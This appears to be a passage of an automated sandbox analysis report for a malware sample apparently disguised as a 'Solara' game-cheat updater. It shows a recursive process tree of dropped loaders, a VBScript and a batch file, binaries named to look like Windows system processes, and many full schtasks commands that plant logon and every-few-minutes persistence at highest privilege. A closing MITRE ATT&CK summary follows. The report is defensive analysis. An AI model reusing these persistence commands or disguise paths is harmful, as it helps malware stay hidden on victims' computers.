C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"57⤵PID:2408
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"57⤵PID:1484
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"58⤵PID:2328
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "59⤵
- Loads dropped DLL
PID:2716 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"60⤵PID:2484
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"57⤵PID:1744
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"58⤵PID:1732
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"59⤵PID:2436
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"59⤵PID:1944
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"58⤵PID:2204
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"59⤵PID:1724
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "60⤵
- Loads dropped DLL
PID:2664 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"61⤵PID:920
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"58⤵PID:2556
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"59⤵PID:1728
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"60⤵PID:3008
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"60⤵PID:828
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"59⤵PID:2592
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"60⤵PID:2796
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\hostNet\zzWFhk48sL1XAtcm8ZFwrdJ4Z261odQNEr02ajJCwirw.bat" "61⤵
- Loads dropped DLL
PID:2276 -
C:\hostNet\bridgeblockportComBroker.exe"C:\hostNet/bridgeblockportComBroker.exe"62⤵PID:1624
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"59⤵PID:832
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"60⤵PID:468
-
C:\Users\Admin\AppData\Local\Temp\XClient.exe"C:\Users\Admin\AppData\Local\Temp\XClient.exe"61⤵PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"C:\Users\Admin\AppData\Local\Temp\RustCheat.exe"61⤵PID:2236
-
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"60⤵PID:1484
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"61⤵PID:1348
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"60⤵PID:2000
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"61⤵PID:2440
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"61⤵PID:2820
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"62⤵PID:924
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"61⤵PID:2484
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"62⤵PID:2912
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"62⤵PID:3068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"63⤵PID:2860
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"62⤵PID:2244
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"63⤵PID:828
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"63⤵PID:1240
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"64⤵PID:1812
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"63⤵PID:2436
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"64⤵PID:848
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"64⤵PID:2820
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"65⤵PID:1588
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"64⤵PID:1808
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"65⤵PID:2052
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"65⤵PID:2224
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"66⤵PID:2312
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"65⤵PID:1464
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"66⤵PID:2992
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"66⤵PID:2068
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"67⤵PID:1232
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"66⤵PID:1880
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"67⤵PID:700
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"67⤵PID:2516
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"68⤵PID:2552
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"67⤵PID:3060
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"68⤵PID:2592
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"68⤵PID:3052
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"69⤵PID:300
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"68⤵PID:2776
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"69⤵PID:2212
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"69⤵PID:2944
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"70⤵PID:2852
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"69⤵PID:1840
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"70⤵PID:2456
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"70⤵PID:1980
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\hostNet\rlqSVEj.vbe"71⤵PID:1568
-
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"70⤵PID:2404
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"71⤵PID:1660
-
-
C:\Users\Admin\AppData\Local\Temp\sol.exe"C:\Users\Admin\AppData\Local\Temp\sol.exe"71⤵PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe"71⤵PID:1576
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "471020934-1427772490-572142708-1711754108-114883849119215268499784406681658966023"1⤵PID:1816
-
C:\Windows\system32\taskeng.exetaskeng.exe {3E5015D7-882C-4837-9D08-B1BE7F1C1340} S-1-5-21-3691908287-3775019229-3534252667-1000:UOTHCPHQ\Admin:Interactive:[1]1⤵PID:2952
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵
- Executes dropped EXE
PID:2440
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2972
-
C:\Users\Admin\AppData\Roaming\svhost.exe.exe"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"3⤵PID:1996
-
-
C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"3⤵PID:2704
-
-
-
C:\Users\Admin\AppData\Roaming\svhost.exeC:\Users\Admin\AppData\Roaming\svhost.exe2⤵PID:2152
-
C:\Users\Admin\AppData\Roaming\svhost.exe.exe"C:\Users\Admin\AppData\Roaming\svhost.exe.exe"3⤵PID:1884
-
-
C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe"3⤵PID:1764
-
-
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 14 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2556
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2156
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "smsss" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\MCT\MCT-ZA\Wallpaper\smss.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2480
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 14 /tr "'C:\hostNet\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2912
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2928
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 10 /tr "'C:\hostNet\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1964
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 12 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:468
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2872
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 9 /tr "'C:\MSOCache\All Users\{90140000-00BA-0409-0000-0000000FF1CE}-C\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:3008
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2352
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscript" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:884
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "wscriptw" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Services\wscript.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2612
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2440
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:848
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "WmiPrvSEW" /sc MINUTE /mo 14 /tr "'C:\Windows\L2Schemas\WmiPrvSE.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:448
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 10 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1100
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBroker" /sc ONLOGON /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1812
-
C:\Windows\system32\schtasks.exeschtasks.exe /create /tn "bridgeblockportComBrokerb" /sc MINUTE /mo 14 /tr "'C:\hostNet\bridgeblockportComBroker.exe'" /rl HIGHEST /f1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2988
Network
MITRE ATT&CK Enterprise v15
Persistence
- Boot or Logon Autostart Execution: 2
  - Registry Run Keys / Startup Folder: 1
  - Winlogon Helper DLL: 1
- Scheduled Task/Job: 1
Privilege Escalation
- Boot or Logon Autostart Execution: 2
  - Registry Run Keys / Startup Folder: 1
  - Winlogon Helper DLL: 1
- Scheduled Task/Job: 1
Downloads